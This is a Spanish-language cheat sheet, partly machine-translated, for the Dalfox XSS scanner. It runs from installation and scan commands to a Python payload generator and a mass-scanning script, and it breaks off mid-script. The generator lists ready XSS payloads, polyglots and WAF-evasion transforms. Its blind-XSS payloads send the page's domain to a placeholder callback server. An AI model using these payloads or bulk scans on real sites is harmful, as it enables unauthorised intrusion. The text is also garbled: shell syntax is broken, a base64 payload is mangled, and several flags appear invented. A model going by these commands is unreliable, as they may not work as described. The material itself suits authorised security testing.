Hoja de Cheat Dalfox
"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Dalfox es un potente, rápido y preciso escáner XSS (Cross-Site Scripting) diseñado para aplicaciones web modernas. Cuenta con la generación de carga útil de software contextual, el análisis DOM inteligente y las técnicas avanzadas de bypass WAF, lo que lo hace ideal para pruebas de seguridad automatizadas y los flujos de trabajo de pruebas de penetración manual.
■ Características clave: Detección contexto de XSS, análisis XSS basado en DOM, técnicas de bypass de WAF, soporte multi-telección, generación de cargas de pago personalizadas y capacidades integrales de presentación de informes.
Instalación y configuración
Instalación binaria
# Download latest release for Linux
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_linux_amd64.tar.gz
tar -xzf dalfox_2.9.2_linux_amd64.tar.gz
sudo mv dalfox /usr/local/bin/
# Download for macOS
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_darwin_amd64.tar.gz
tar -xzf dalfox_2.9.2_darwin_amd64.tar.gz
sudo mv dalfox /usr/local/bin/
# Download for Windows
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_windows_amd64.zip
unzip dalfox_2.9.2_windows_amd64.zip
# Move dalfox.exe to PATH
# Verify installation
dalfox version
# Check available options
dalfox help
Instalación
# Install via Go (requires Go 1.19+)
go install github.com/hahwul/dalfox/v2@latest
# Verify installation
dalfox version
# Update to latest version
go install github.com/hahwul/dalfox/v2@latest
# Install specific version
go install github.com/hahwul/dalfox/v2@v2.9.2
# Build from source
git clone https://github.com/hahwul/dalfox.git
cd dalfox
go build -o dalfox main.go
sudo mv dalfox /usr/local/bin/
Docker Instalación
# Pull official Docker image
docker pull hahwul/dalfox:latest
# Run Dalfox in Docker
docker run --rm hahwul/dalfox:latest version
# Run with volume mount for output
docker run --rm -v $(pwd):/app hahwul/dalfox:latest url https://example.com
# Create alias for easier usage
echo 'alias dalfox="docker run --rm -v $(pwd):/app hahwul/dalfox:latest"' >> ~/.bashrc
source ~/.bashrc
# Build custom Docker image
cat > Dockerfile << EOF
FROM hahwul/dalfox:latest
RUN apk add --no-cache curl jq
COPY custom-payloads.txt /app/
EOF
docker build -t custom-dalfox .
Paquete Manager Instalación
# Homebrew (macOS/Linux)
brew install dalfox
# Arch Linux (AUR)
yay -S dalfox-bin
# Snap package
sudo snap install dalfox
# APT (Ubuntu/Debian) - via GitHub releases
curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest \
| grep "browser_download_url.*linux_amd64.deb" \
| cut -d '"' -f 4 \
| wget -qi -
sudo dpkg -i dalfox_*.deb
# RPM (CentOS/RHEL/Fedora)
curl -s https://api.github.com/repos/hahwul/dalfox/releases/latest \
| grep "browser_download_url.*linux_amd64.rpm" \
| cut -d '"' -f 4 \
| wget -qi -
sudo rpm -i dalfox_*.rpm
Uso básico y comandos
URL única Scanning
# Basic XSS scan
dalfox url https://example.com
# Scan with custom user agent
dalfox url https://example.com --user-agent "Mozilla/5.0 Custom Agent"
# Scan with authentication cookie
dalfox url https://example.com --cookie "session=abc123; auth=xyz789"
# Scan with custom headers
dalfox url https://example.com --header "Authorization: Bearer token123"
# Scan with proxy
dalfox url https://example.com --proxy http://127.0.0.1:8080
# Scan with custom timeout
dalfox url https://example.com --timeout 30
# Scan with verbose output
dalfox url https://example.com --verbose
# Scan with debug information
dalfox url https://example.com --debug
URL múltiple Scanning
# Scan multiple URLs from file
echo -e "https://example.com\nhttps://test.com" > urls.txt
dalfox file urls.txt
# Scan URLs from stdin
echo "https://example.com" | dalfox pipe
# Scan with threading
dalfox file urls.txt --worker 50
# Scan with rate limiting
dalfox file urls.txt --delay 1000 # 1 second delay
# Scan with custom output format
dalfox file urls.txt --format json
# Scan and save results
dalfox file urls.txt --output results.txt
# Scan with progress bar
dalfox file urls.txt --silence --format plain
Parameter Discovery and Testing
# Scan with parameter discovery
dalfox url https://example.com --mining-dict
# Use custom parameter wordlist
dalfox url https://example.com --mining-dict-word custom-params.txt
# Scan specific parameters
dalfox url "https://example.com?param1=test¶m;2=value"
# Scan POST parameters
dalfox url https://example.com --data "username=admin&password;=test"
# Scan with custom parameter injection
dalfox url https://example.com --custom-payload "<script>alert('XSS')</script>"
# Scan with parameter pollution
dalfox url https://example.com --param-pollution
# Test all HTTP methods
dalfox url https://example.com --method GET,POST,PUT,DELETE
Detección avanzada XSS
Escáner de Context-Aware
# Enable context analysis
dalfox url https://example.com --mining-dom
# Deep DOM analysis
dalfox url https://example.com --mining-dom --deep-domxss
# Scan for DOM-based XSS
dalfox url https://example.com --dom
# Analyze JavaScript context
dalfox url https://example.com --js-analysis
# Custom JavaScript payload testing
dalfox url https://example.com --custom-js "console.log('XSS')"
# Test event handlers
dalfox url https://example.com --event-handlers
# Scan with browser simulation
dalfox url https://example.com --browser-simulation
Técnicas de derivación de WAF
# Enable WAF bypass mode
dalfox url https://example.com --waf-evasion
# Use encoding techniques
dalfox url https://example.com --encoder url,html,js
# Custom encoding payloads
dalfox url https://example.com --custom-encoder "base64,hex"
# Bypass with case variations
dalfox url https://example.com --case-variation
# Use obfuscation techniques
dalfox url https://example.com --obfuscation
# Fragment-based bypass
dalfox url https://example.com --fragment-bypass
# Comment-based bypass
dalfox url https://example.com --comment-bypass
# Unicode bypass techniques
dalfox url https://example.com --unicode-bypass
Personalización de carga
# Use custom payload file
cat > custom-payloads.txt << EOF
<script>alert('Custom XSS 1')</script>
<img src=x onerror=alert('Custom XSS 2')>
<svg onload=alert('Custom XSS 3')>
javascript:alert('Custom XSS 4')
EOF
dalfox url https://example.com --custom-payload-file custom-payloads.txt
# Generate payloads for specific context
dalfox url https://example.com --payload-context attribute
# Use polyglot payloads
dalfox url https://example.com --polyglot
# Test with specific payload types
dalfox url https://example.com --payload-type script,img,svg,iframe
# Custom payload with variables
dalfox url https://example.com --custom-payload "<script>alert('{{RANDOM}}')</script>"
# Blind XSS testing
dalfox url https://example.com --blind-xss --blind-url https://your-server.com/collect
Automatización e integración
CI/CD Integration
#!/bin/bash
# CI/CD script for automated XSS testing
set -e
TARGET_URL="$1"
OUTPUT_DIR="$2"
THRESHOLD="$3"
| if [ -z "$TARGET_URL" ] | | [ -z "$OUTPUT_DIR" ]; then |
echo "Usage: $0 <target_url> <output_dir> [threshold]"
exit 1
fi
THRESHOLD=${THRESHOLD:-0} # Default: fail on any XSS found
echo "Starting XSS scan with Dalfox..."
echo "Target: $TARGET_URL"
echo "Output directory: $OUTPUT_DIR"
echo "Threshold: $THRESHOLD vulnerabilities"
mkdir -p "$OUTPUT_DIR"
# Run Dalfox scan
dalfox url "$TARGET_URL" \
--format json \
--output "$OUTPUT_DIR/dalfox-results.json" \
--worker 20 \
--timeout 30 \
--mining-dict \
--dom \
--waf-evasion \
--verbose
# Parse results
| VULN_COUNT=$(jq '.vulnerabilities | length' "$OUTPUT_DIR/dalfox-results.json" 2>/dev/null | | echo "0") |
echo "Found $VULN_COUNT XSS vulnerabilities"
# Generate summary report
cat > "$OUTPUT_DIR/xss-summary.txt" << EOF
XSS Security Scan Summary
========================
Date: $(date)
Target: $TARGET_URL
Scanner: Dalfox
Vulnerabilities Found: $VULN_COUNT
Threshold: $THRESHOLD
Status: $(if [ "$VULN_COUNT" -le "$THRESHOLD" ]; then echo "PASS"; else echo "FAIL"; fi)
EOF
# Generate HTML report
if command -v jq >/dev/null 2>&1; then
python3 << 'PYTHON_EOF'
import json
import sys
import os
output_dir = sys.argv[1]
results_file = os.path.join(output_dir, "dalfox-results.json")
try:
with open(results_file, 'r') as f:
data = json.load(f)
vulnerabilities = data.get('vulnerabilities', [])
html_content = f"""
<!DOCTYPE html>
<html>
<head>
<title>Dalfox XSS Scan Report</title>
<style>
body {{ font-family: Arial, sans-serif; margin: 20px; }}
.header {{ background-color: #f0f0f0; padding: 20px; border-radius: 5px; }}
.vuln {{ margin: 10px 0; padding: 15px; border-left: 4px solid #dc3545; background-color: #f8f9fa; }}
.safe {{ color: #28a745; }}
.danger {{ color: #dc3545; }}
table {{ border-collapse: collapse; width: 100%; margin: 20px 0; }}
th, td {{ border: 1px solid #ddd; padding: 8px; text-align: left; }}
th {{ background-color: #f2f2f2; }}
</style>
</head>
<body>
<div class="header">
<h1>Dalfox XSS Scan Report</h1>
<p><strong>Target:</strong> {data.get('target', 'Unknown')}</p>
<p><strong>Scan Date:</strong> {data.get('timestamp', 'Unknown')}</p>
<p><strong>Vulnerabilities Found:</strong> <span class="{'danger' if len(vulnerabilities) > 0 else 'safe'}">{len(vulnerabilities)}</span></p>
</div>
<h2>Vulnerability Details</h2>
"""
if vulnerabilities:
html_content += "<table><tr><th>Type</th><th>URL</th><th>Parameter</th><th>Payload</th><th>Evidence</th></tr>"
for vuln in vulnerabilities:
html_content += f"""
<tr>
<td>{vuln.get('type', 'XSS')}</td>
<td>{vuln.get('url', '')}</td>
<td>{vuln.get('parameter', '')}</td>
<td><code>{vuln.get('payload', '')}</code></td>
<td>{vuln.get('evidence', '')}</td>
</tr>
"""
html_content += "</table>"
else:
html_content += "<p class='safe'>No XSS vulnerabilities detected.</p>"
html_content += """
</body>
</html>
"""
with open(os.path.join(output_dir, "dalfox-report.html"), 'w') as f:
f.write(html_content)
print(f"HTML report generated: {os.path.join(output_dir, 'dalfox-report.html')}")
except Exception as e:
print(f"Error generating HTML report: {e}")
PYTHON_EOF
fi
# Check threshold and exit
if [ "$VULN_COUNT" -gt "$THRESHOLD" ]; then
echo "ERROR: Found $VULN_COUNT vulnerabilities, exceeds threshold of $THRESHOLD"
exit 1
else
echo "SUCCESS: Vulnerability count within acceptable threshold"
exit 0
fi
GitHub Actions Integration
# .github/workflows/xss-security-scan.yml
name: XSS Security Scan with Dalfox
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main ]
schedule:
- cron: '0 2 * * 1' # Weekly scan on Mondays at 2 AM
jobs:
xss-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Install Dalfox
run: |
wget https://github.com/hahwul/dalfox/releases/latest/download/dalfox_2.9.2_linux_amd64.tar.gz
tar -xzf dalfox_2.9.2_linux_amd64.tar.gz
sudo mv dalfox /usr/local/bin/
dalfox version
- name: Start application
run: |
# Start your web application here
npm start &
sleep 30 # Wait for application to start
- name: Run XSS scan
run: |
mkdir -p scan-results
# Scan main application endpoints
dalfox url http://localhost:3000 \
--format json \
--output scan-results/main-scan.json \
--worker 10 \
--timeout 30 \
--mining-dict \
--dom \
--waf-evasion
# Scan API endpoints
dalfox url http://localhost:3000/api \
--format json \
--output scan-results/api-scan.json \
--worker 10 \
--timeout 30 \
--data "param1=test¶m;2=value"
# Scan with authentication
dalfox url http://localhost:3000/dashboard \
--format json \
--output scan-results/auth-scan.json \
--cookie "session=${{ secrets.TEST_SESSION_COOKIE }}" \
--worker 10
- name: Process scan results
run: |
# Combine all scan results
jq -s 'add' scan-results/*.json > scan-results/combined-results.json
# Count vulnerabilities
VULN_COUNT=$(jq '.vulnerabilities | length' scan-results/combined-results.json)
echo "VULN_COUNT=$VULN_COUNT" >> $GITHUB_ENV
# Generate summary
echo "XSS vulnerabilities found: $VULN_COUNT" > scan-results/summary.txt
- name: Upload scan results
uses: actions/upload-artifact@v3
with:
name: xss-scan-results
path: scan-results/
- name: Comment PR with results
if: github.event_name == 'pull_request'
uses: actions/github-script@v6
with:
script: |
const fs = require('fs');
const summary = fs.readFileSync('scan-results/summary.txt', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: `## XSS Security Scan Results\n\n\`\`\`\n${summary}\n\`\`\``
});
- name: Fail if vulnerabilities found
run: |
if [ "$VULN_COUNT" -gt "0" ]; then
echo "XSS vulnerabilities detected! Check the scan results."
exit 1
fi
Burp Suite Integration
# Burp Suite extension for Dalfox integration
from burp import IBurpExtender, ITab, IHttpListener
from java.awt import Component
from java.awt import GridBagLayout, GridBagConstraints
from javax.swing import JPanel, JButton, JTextArea, JScrollPane, JLabel
import subprocess
import json
import threading
class BurpExtender(IBurpExtender, ITab, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("Dalfox Integration")
# Create UI
self._jPanel = JPanel(GridBagLayout())
# Add components
constraints = GridBagConstraints()
# Title
constraints.gridx = 0
constraints.gridy = 0
constraints.gridwidth = 2
self._jPanel.add(JLabel("Dalfox XSS Scanner Integration"), constraints)
# Scan button
constraints.gridx = 0
constraints.gridy = 1
constraints.gridwidth = 1
self._scanButton = JButton("Scan with Dalfox", actionPerformed=self.scanWithDalfox)
self._jPanel.add(self._scanButton, constraints)
# Results area
constraints.gridx = 0
constraints.gridy = 2
constraints.gridwidth = 2
constraints.fill = GridBagConstraints.BOTH
constraints.weightx = 1.0
constraints.weighty = 1.0
self._resultsArea = JTextArea(20, 80)
self._resultsArea.setEditable(False)
scrollPane = JScrollPane(self._resultsArea)
self._jPanel.add(scrollPane, constraints)
# Register as HTTP listener
callbacks.registerHttpListener(self)
# Add tab
callbacks.addSuiteTab(self)
print("Dalfox Integration extension loaded")
def getTabCaption(self):
return "Dalfox"
def getUiComponent(self):
return self._jPanel
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Auto-scan interesting requests
if messageIsRequest:
return
# Get request/response
request = messageInfo.getRequest()
response = messageInfo.getResponse()
# Parse URL
requestInfo = self._helpers.analyzeRequest(messageInfo)
url = str(requestInfo.getUrl())
# Check if response contains forms or parameters
responseString = self._helpers.bytesToString(response)
if "<form" in responseString.lower() or "input" in responseString.lower():
self.addToResults(f"Potential XSS target detected: {url}")
def scanWithDalfox(self, event):
# Get selected request from Burp
selectedMessages = self._callbacks.getSelectedMessages()
if not selectedMessages:
self.addToResults("No request selected. Please select a request in Burp.")
return
# Start scan in background thread
thread = threading.Thread(target=self.runDalfoxScan, args=(selectedMessages,))
thread.daemon = True
thread.start()
def runDalfoxScan(self, selectedMessages):
try:
for messageInfo in selectedMessages:
# Get request details
requestInfo = self._helpers.analyzeRequest(messageInfo)
url = str(requestInfo.getUrl())
self.addToResults(f"Starting Dalfox scan for: {url}")
# Prepare Dalfox command
cmd = [
"dalfox",
"url",
url,
"--format", "json",
"--worker", "5",
"--timeout", "10"
]
# Add cookies if present
headers = requestInfo.getHeaders()
for header in headers:
if header.lower().startswith("cookie:"):
cookie_value = header[7:].strip() # Remove "Cookie: "
cmd.extend(["--cookie", cookie_value])
break
# Run Dalfox
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True
)
stdout, stderr = process.communicate()
if process.returncode == 0:
try:
results = json.loads(stdout)
self.processDalfoxResults(url, results)
except json.JSONDecodeError:
self.addToResults(f"Scan completed for {url}, but no JSON output received")
else:
self.addToResults(f"Dalfox scan failed for {url}: {stderr}")
except Exception as e:
self.addToResults(f"Error running Dalfox scan: {str(e)}")
def processDalfoxResults(self, url, results):
vulnerabilities = results.get('vulnerabilities', [])
if vulnerabilities:
self.addToResults(f"XSS vulnerabilities found in {url}:")
for vuln in vulnerabilities:
vuln_type = vuln.get('type', 'XSS')
parameter = vuln.get('parameter', 'Unknown')
payload = vuln.get('payload', 'Unknown')
self.addToResults(f" - {vuln_type} in parameter '{parameter}'")
self.addToResults(f" Payload: {payload}")
else:
self.addToResults(f"No XSS vulnerabilities found in {url}")
def addToResults(self, text):
current_text = self._resultsArea.getText()
new_text = current_text + "\n" + text
self._resultsArea.setText(new_text)
self._resultsArea.setCaretPosition(len(new_text))
Técnicas avanzadas y metodologías
Desarrollo de las cargas de pago personalizadas
#!/usr/bin/env python3
# Advanced payload generator for Dalfox
import random
import string
import base64
import urllib.parse
import json
class DalfoxPayloadGenerator:
def __init__(self):
self.contexts = [
'html', 'attribute', 'javascript', 'css', 'url', 'json'
]
self.encodings = [
'url', 'html', 'js', 'base64', 'hex', 'unicode'
]
self.evasion_techniques = [
'case_variation', 'comment_insertion', 'whitespace_variation',
'encoding_variation', 'tag_variation', 'event_variation'
]
def generate_context_aware_payloads(self, context='html'):
"""Generate payloads specific to injection context"""
payloads = []
if context == 'html':
payloads.extend([
'<script>alert("XSS")</script>',
'<img src=x onerror=alert("XSS")>',
'<svg onload=alert("XSS")>',
'<iframe src=javascript:alert("XSS")>',
'<body onload=alert("XSS")>',
'<input onfocus=alert("XSS") autofocus>',
'<select onfocus=alert("XSS") autofocus>',
'<textarea onfocus=alert("XSS") autofocus>',
'<keygen onfocus=alert("XSS") autofocus>',
'<video><source onerror=alert("XSS")>'
])
elif context == 'attribute':
payloads.extend([
'" onmouseover=alert("XSS") "',
'\' onmouseover=alert("XSS") \'',
'javascript:alert("XSS")',
'" onfocus=alert("XSS") autofocus="',
'\' onfocus=alert("XSS") autofocus=\'',
'" onload=alert("XSS") "',
'\' onload=alert("XSS") \'',
'" onerror=alert("XSS") "',
'\' onerror=alert("XSS") \''
])
elif context == 'javascript':
payloads.extend([
'alert("XSS")',
'confirm("XSS")',
'prompt("XSS")',
'console.log("XSS")',
'eval("alert(\\"XSS\\")")',
'Function("alert(\\"XSS\\")")()',
'setTimeout("alert(\\"XSS\\")", 0)',
'setInterval("alert(\\"XSS\\")", 0)',
'document.write("XSS")',
'window.location="javascript:alert(\\"XSS\\")"'
])
elif context == 'css':
payloads.extend([
'expression(alert("XSS"))',
'url("javascript:alert(\\"XSS\\")")',
'behavior:url("javascript:alert(\\"XSS\\")")',
'@import "javascript:alert(\\"XSS\\")"',
'background:url("javascript:alert(\\"XSS\\")")'
])
elif context == 'url':
payloads.extend([
'javascript:alert("XSS")',
'data:text/html,<script>alert("XSS")</script>',
'vbscript:alert("XSS")',
'livescript:alert("XSS")',
'mocha:alert("XSS")',
'feed:javascript:alert("XSS")',
'view-source:javascript:alert("XSS")'
])
elif context == 'json':
payloads.extend([
'{"xss":"<script>alert(\\"XSS\\")</script>"}',
'{"xss":"<img src=x onerror=alert(\\"XSS\\")>"}',
'{"xss":"javascript:alert(\\"XSS\\")"}',
'{"xss":"\\u003cscript\\u003ealert(\\"XSS\\")\\u003c/script\\u003e"}'
])
return payloads
def apply_encoding(self, payload, encoding='url'):
"""Apply various encoding techniques to payloads"""
if encoding == 'url':
return urllib.parse.quote(payload)
elif encoding == 'html':
return payload.replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''')
elif encoding == 'js':
return payload.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
elif encoding == 'base64':
return base64.b64encode(payload.encode()).decode()
elif encoding == 'hex':
return ''.join([hex(ord(c))[2:] for c in payload])
elif encoding == 'unicode':
return ''.join([f'\\u{ord(c):04x}' for c in payload])
return payload
def apply_evasion(self, payload, technique='case_variation'):
"""Apply WAF evasion techniques"""
if technique == 'case_variation':
result = ''
for char in payload:
if char.isalpha():
result += char.upper() if random.choice([True, False]) else char.lower()
else:
result += char
return result
elif technique == 'comment_insertion':
# Insert HTML comments
return payload.replace('<script>', '<script/**/>')
elif technique == 'whitespace_variation':
# Use various whitespace characters
whitespace_chars = [' ', '\t', '\n', '\r', '\f', '\v']
return payload.replace(' ', random.choice(whitespace_chars))
elif technique == 'tag_variation':
# Use alternative tags
tag_alternatives = {
'script': ['SCRIPT', 'Script', 'sCrIpT'],
'img': ['IMG', 'Img', 'iMg'],
'svg': ['SVG', 'Svg', 'sVg']
}
result = payload
for tag, alternatives in tag_alternatives.items():
if tag in payload.lower():
result = result.replace(tag, random.choice(alternatives))
return result
elif technique == 'event_variation':
# Use alternative event handlers
event_alternatives = {
'onload': ['onLoad', 'ONLOAD', 'OnLoad'],
'onerror': ['onError', 'ONERROR', 'OnError'],
'onclick': ['onClick', 'ONCLICK', 'OnClick']
}
result = payload
for event, alternatives in event_alternatives.items():
if event in payload.lower():
result = result.replace(event, random.choice(alternatives))
return result
return payload
def generate_polyglot_payloads(self):
"""Generate polyglot payloads that work in multiple contexts"""
polyglots = [
'javascript:/*--></title></style></textarea></script></xmp><svg/onload=\'+/"/+/onmouseover=1/+/[*/[]/+alert(1)//\'>',
'"><img src=x onerror=alert(1)>',
'\';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>',
'\'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>\'">',
'jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//',
'<svg/onload=alert(1)>',
'<img src=x onerror=alert(1)>',
'<iframe src=javascript:alert(1)>',
'<body onload=alert(1)>',
'<script>alert(1)</script>'
]
return polyglots
def generate_blind_xss_payloads(self, callback_url):
"""Generate payloads for blind XSS testing"""
payloads = [
f'<script>fetch("{callback_url}?xss="+document.domain)</script>',
f'<img src=x onerror=fetch("{callback_url}?xss="+document.domain)>',
f'<svg onload=fetch("{callback_url}?xss="+document.domain)>',
f'<script>new Image().src="{callback_url}?xss="+document.domain</script>',
f'<script>document.location="{callback_url}?xss="+document.domain</script>',
f'<script>navigator.sendBeacon("{callback_url}", document.domain)</script>',
f'<script>eval(atob("ZmV0Y2goIi4uLiIp")).replace("...", "{callback_url}?xss="+document.domain)</script>'
]
return payloads
def save_payloads_to_file(self, payloads, filename):
"""Save generated payloads to file for use with Dalfox"""
with open(filename, 'w') as f:
for payload in payloads:
f.write(payload + '\n')
print(f"Saved {len(payloads)} payloads to {filename}")
def generate_comprehensive_payload_set(self, callback_url=None):
"""Generate comprehensive set of payloads for all contexts"""
all_payloads = []
# Generate context-specific payloads
for context in self.contexts:
context_payloads = self.generate_context_aware_payloads(context)
all_payloads.extend(context_payloads)
# Add polyglot payloads
all_payloads.extend(self.generate_polyglot_payloads())
# Add blind XSS payloads if callback URL provided
if callback_url:
all_payloads.extend(self.generate_blind_xss_payloads(callback_url))
# Apply various evasion techniques
evasion_payloads = []
for payload in all_payloads[:20]: # Apply to first 20 payloads
for technique in self.evasion_techniques:
evasion_payloads.append(self.apply_evasion(payload, technique))
all_payloads.extend(evasion_payloads)
# Apply various encodings
encoded_payloads = []
for payload in all_payloads[:10]: # Apply to first 10 payloads
for encoding in self.encodings:
encoded_payloads.append(self.apply_encoding(payload, encoding))
all_payloads.extend(encoded_payloads)
# Remove duplicates
all_payloads = list(set(all_payloads))
return all_payloads
# Usage example
if __name__ == "__main__":
generator = DalfoxPayloadGenerator()
# Generate comprehensive payload set
payloads = generator.generate_comprehensive_payload_set("https://your-callback-server.com/collect")
# Save to file
generator.save_payloads_to_file(payloads, "custom-dalfox-payloads.txt")
print(f"Generated {len(payloads)} unique payloads")
# Example usage with Dalfox
print("\nTo use with Dalfox:")
print("dalfox url https://target.com --custom-payload-file custom-dalfox-payloads.txt")
Automatización de exploración masiva
#!/bin/bash
# Mass XSS scanning script with Dalfox
set -e
TARGETS_FILE="$1"
OUTPUT_DIR="$2"
THREADS="$3"
DELAY="$4"
| if [ -z "$TARGETS_FILE" ] | | [ -z "$OUTPUT_DIR" ]; then |
echo "Usage: $0 <targets_file> <output_dir> [threads] [delay_ms]"
echo "Example: $0 targets.txt results/ 20 1000"
exit 1
fi
THREADS=${THREADS:-10}
DELAY=${DELAY:-500}
echo "Starting mass XSS scanning with Dalfox"
echo "Targets file: $TARGETS_FILE"
echo "Output directory: $OUTPUT_DIR"
echo "Threads: $THREADS"
echo "Delay: ${DELAY}ms"
mkdir -p "$OUTPUT_DIR"
# Validate targets file
if [ ! -f "$TARGETS_FILE" ]; then
echo "Error: Targets file not found: $TARGETS_FILE"
exit 1
fi
TARGET_COUNT=$(wc -l < "$TARGETS_FILE")
echo "Total targets: $TARGET_COUNT"
# Create scan configuration
cat > "$OUTPUT_DIR/scan-config.json" << EOF
{
"scan_date": "$(date -Iseconds)",
"targets_file": "$TARGETS_FILE",
"target_count": $TARGET_COUNT,
"threads": $THREADS,
"delay_ms": $DELAY,
| "dalfox_version": "$(dalfox version 2>/dev/null | | echo 'unknown')" |
}
EOF
# Function to scan single target
scan_target() {
local target="$1"
local output_dir="$2"
local delay="$3"
# Create safe filename
| local safe_filename=$(echo "$target" | sed 's | https\?:// | | g' | sed 's | [^a-zA-Z0-9.-] | _ | g') |
local output_file="$output_dir/${safe_filename}.json"
echo "Scanning: $target"
# Run Dalfox scan
timeout 300 dalfox url "$target" \
--format json \
--output "$output_file" \
--worker 5 \
--timeout 30 \
--delay "$delay" \
--mining-dict \
--dom \
--waf-evasion \
--silence \
| 2>/dev/null | | { |
echo "Scan failed or timed out for: $target"
echo '{"error": "scan_failed", "target": "'$target'", "timestamp": "'$(date -Iseconds)'"}' > "$output_file"
}
# Add metadata to result
if [ -f "$output_file" ]; then
# Create temporary file with metadata
| jq '. + {"scan_metadata": {"target": "'$target'", "scan_time": "'$(date -Iseconds)'"}}' "$output_file" > "$output_file.tmp" 2>/dev/null | | { |
# If jq fails, create basic JSON structure
echo '{"target": "'$target'", "scan_time": "'$(date -Iseconds)'", "error": "json_parse_failed"}' > "$output_file.tmp"
}
mv "$output_file.tmp" "$output_file"
fi
}
export -f scan_target
# Run parallel scans
echo "Starting parallel scans..."
cat "$TARGETS_FILE" | xargs -I {} -P "$THREADS" bash -c 'scan_target "$@"' _ {} "$OUTPUT_DIR" "$DELAY"
echo "Scanning completed. Processing results..."
# Combine all results
echo "Combining scan results..."
find "$OUTPUT_DIR" -name "*.json" -type f | while read -r file; do
if [ -s "$file" ]; then # Check if file is not empty
cat "$file"
echo ","
fi
| done | sed '$ s/,$//' | sed '1i[' | sed '$a]' > "$OUTPUT_DIR/combined-results.json" |
# Generate summary statistics
python3 << 'PYTHON_EOF'
import json
import sys
import os
from collections import defaultdict
output_dir = sys.argv[1]
combined_file = os.path.join(output_dir, "combined-results.json")
try:
with open(combined_file, 'r') as f:
results = json.load(f)
stats = {
"total_targets": len(results),
"successful_scans": 0,
"failed_scans": 0,
"total_vulnerabilities": 0,
"vulnerable_targets": 0,
"vulnerability_types": defaultdict(int),
"targets_with_vulns": []
}
for result in results:
if "error" in result:
stats["failed_scans"] += 1
continue
stats["successful_scans"] += 1
vulnerabilities = result.get("vulnerabilities", [])
if vulnerabilities:
stats["vulnerable_targets"] += 1
stats["targets_with_vulns"].append({
"target": result.get("target", "unknown"),
"vuln_count": len(vulnerabilities)
})
stats["total_vulnerabilities"] += len(vulnerabilities)
for vuln in vulnerabilities:
vuln_type = vuln.get("type", "unknown")
stats["vulnerability_types"][vuln_type] += 1
# Convert defaultdict to regular dict for JSON serialization
stats["vulnerability_types"] = dict(stats["vulnerability_types"])
# Save statistics
with open(os.path.join(output_dir, "scan-statistics.json"), 'w') as f:
json.dump(stats, f, indent=2)
# Generate text summary
summary_text = f"""
XSS Mass Scanning Summary
========================
Scan Date: {results[0].get('scan_metadata', {}).get('scan_time', 'unknown') if results else 'unknown'}
Total Targets: {stats['total_targets']}
Successful Scans: {stats['successful_scans']}
Failed Scans: {stats['failed_scans']}
Success Rate: {(stats['successful_scans'] / stats['total_targets'] * 100):.1f}%
Vulnerability Summary:
- Total Vulnerabilities: {stats['total_vulnerabilities']}
- Vulnerable Targets: {stats['vulnerable_targets']}
- Vulnerability Rate: {(stats['vulnerable_targets'] / stats['successful_scans'] * 100):.1f}%
Vulnerability Types:
"""
for vuln_type, count in stats["vulnerability_types"].items():
summary_text += f"- {vuln_type}: {count}\n"
summary_text += "\nMost Vulnerable Targets:\n"
sorted_targets = sorted(stats["targets_with_vulns"], key=lambda x: x["vuln_count"], reverse=True)
for target in sorted_targets[:10]:
summary_text += f"- {target['target']}: {target['vuln_count']} vulnerabilities\n"
with open(os.path.join(output_dir, "scan-summary.txt"), 'w') as f:
f.write(summary_text)
print("Scan statistics generated successfully")
print(f"Total vulnerabilities found: {stats['total_vulnerabilities']}")
print(f"Vulnerable targets: {stats['vulnerable_targets']}/{stats['successful_scans']}")
except Exception as e:
print(f"Error processing results: {e}")
sys.exit(1)
PYTHON_EOF
echo "Mass scanning completed!"
echo "Results saved to: $OUTPUT_DIR"
echo "Summary: $OUTPUT_DIR/scan-summary.txt"
echo "Statistics: $OUTPUT_DIR/scan-statistics.json"
echo "Combined results: $OUTPUT_DIR/combined-results.json"
Optimización del rendimiento y solución de problemas
Performance Tuning
# Optimize Dalfox for different scenarios
# High-speed scanning (less accuracy)
dalfox url https://example.com \
--worker 50 \
--timeout 5 \
--delay 100 \
--skip-mining \
--skip-dom \
--format plain
# Thorough scanning (high accuracy)
dalfox url https://example.com \
--worker 10 \
--timeout 60 \
--delay 2000 \
--mining-dict \
--mining-dom \
--deep-domxss \
--waf-evasion \
--format json
# Memory-efficient scanning for large targets
dalfox file large-targets.txt \
--worker 5 \
--timeout 30 \
--delay 1000 \
--batch-size 100 \
--format plain
# Network-optimized scanning
dalfox url https://example.com \
--worker 20 \
--timeout 15 \
--delay 500 \
--retry 2 \
--proxy http://127.0.0.1:8080
# Resource monitoring during scans
#!/bin/bash
monitor_dalfox_performance() {
local target="$1"
local output_file="performance-$(date +%s).log"
echo "Starting performance monitoring for Dalfox scan"
echo "Target: $target"
echo "Log file: $output_file"
# Start monitoring in background
{
echo "Timestamp,CPU%,Memory(MB),Network(KB/s)"
